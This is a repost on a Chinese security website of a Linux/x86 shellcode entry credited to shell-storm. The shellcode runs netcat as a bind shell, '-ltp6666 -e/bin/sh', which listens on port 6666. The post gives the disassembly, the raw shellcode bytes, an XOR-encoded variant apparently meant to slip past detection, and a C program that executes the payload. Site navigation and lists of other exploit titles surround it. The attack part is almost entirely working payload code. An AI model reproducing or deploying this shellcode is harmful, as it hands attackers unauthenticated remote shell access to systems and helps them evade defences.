首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux/x86 - netcat bindshell port 6666 - 69 bytes
来源:http://shell-storm.org 作者:Salwan 发布时间:2011-04-22  

/*
** Title:     Linux/x86 - netcat bindshell port 6666 - 69 bytes
** Date:      2011-04-20
** Author:    Jonathan Salwan
**
** http://shell-storm.org
** http://twitter.com/#!/shell_storm
**
** /usr/bin/netcat -ltp6666 -e/bin/sh
**
** 8048054 <.text>:
** 8048054: 31 c0                 xor    %eax,%eax
** 8048056: 50                    push   %eax
** 8048057: 68 74 63 61 74        push   $0x74616374
** 804805c: 68 6e 2f 6e 65        push   $0x656e2f6e
** 8048061: 68 72 2f 62 69        push   $0x69622f72
** 8048066: 68 2f 2f 75 73        push   $0x73752f2f
** 804806b: 89 e3                 mov    %esp,%ebx
** 804806d: 50                    push   %eax
** 804806e: 68 36 36 36 36        push   $0x36363636
** 8048073: 68 2d 6c 74 70        push   $0x70746c2d
** 8048078: 89 e2                 mov    %esp,%edx
** 804807a: 50                    push   %eax
** 804807b: 68 6e 2f 73 68        push   $0x68732f6e
** 8048080: 68 2f 2f 62 69        push   $0x69622f2f
** 8048085: 66 68 2d 65           pushw  $0x652d
** 8048089: 89 e1                 mov    %esp,%ecx
** 804808b: 50                    push   %eax
** 804808c: 51                    push   %ecx
** 804808d: 52                    push   %edx
** 804808e: 53                    push   %ebx
** 804808f: 89 e6                 mov    %esp,%esi
** 8048091: b0 0b                 mov    $0xb,%al
** 8048093: 89 f1                 mov    %esi,%ecx
** 8048095: 31 d2                 xor    %edx,%edx
** 8048097: cd 80                 int    $0x80
**
*/


#include <stdio.h>
#include <string.h>

char SC[] = "\x31\xc0\x50\x68\x74\x63\x61\x74\x68\x6e\x2f"
            "\x6e\x65\x68\x72\x2f\x62\x69\x68\x2f\x2f\x75"
            "\x73\x89\xe3\x50\x68\x36\x36\x36\x36\x68\x2d"
            "\x6c\x74\x70\x89\xe2\x50\x68\x6e\x2f\x73\x68"
            "\x68\x2f\x2f\x62\x69\x66\x68\x2d\x65\x89\xe1"
            "\x50\x51\x52\x53\x89\xe6\xb0\x0b\x89\xf1\x31"
            "\xd2\xcd\x80";


                /*  SC polymorphic - XOR 19 - 93 bytes  */
char SC_ENC[] = "\xeb\x11\x5e\x31\xc9\xb1\x45\x80\x74\x0e"
                "\xff\x13\x80\xe9\x01\x75\xf6\xeb\x05\xe8"
                "\xea\xff\xff\xff\x22\xd3\x43\x7b\x67\x70"
                "\x72\x67\x7b\x7d\x3c\x7d\x76\x7b\x61\x3c"
                "\x71\x7a\x7b\x3c\x3c\x66\x60\x9a\xf0\x43"
                "\x7b\x25\x25\x25\x25\x7b\x3e\x7f\x67\x63"
                "\x9a\xf1\x43\x7b\x7d\x3c\x60\x7b\x7b\x3c"
                "\x3c\x71\x7a\x75\x7b\x3e\x76\x9a\xf2\x43"
                "\x42\x41\x40\x9a\xf5\xa3\x18\x9a\xe2\x22"
                "\xc1\xde\x93";

int main(void)
{
        fprintf(stdout,"Length: %d\n",strlen(SC));
        (*(void(*)()) SC)();
return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Wireshark <= 1.4.4 packet-dect
·docuFORM Mercury WebApp 6.16a/
·Gesytec ElonFmt ActiveX 1.1.14
·QtWeb Browser 3.7.2 Denial Of
·KMPlayer 2.9.x (.kpl) Stack Bu
·Spreecommerce Arbitrary Comman
·Windows Media Player 11 .ogg P
·Media Player Classic 6.4.9.1 P
·Google Chrome 10.0.648.205 Sta
·PHP phar extension 1.1.1 Heap
·IBM Tivoli Directory Server SA
·Adobe Flash Player < 10.1.53 .
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved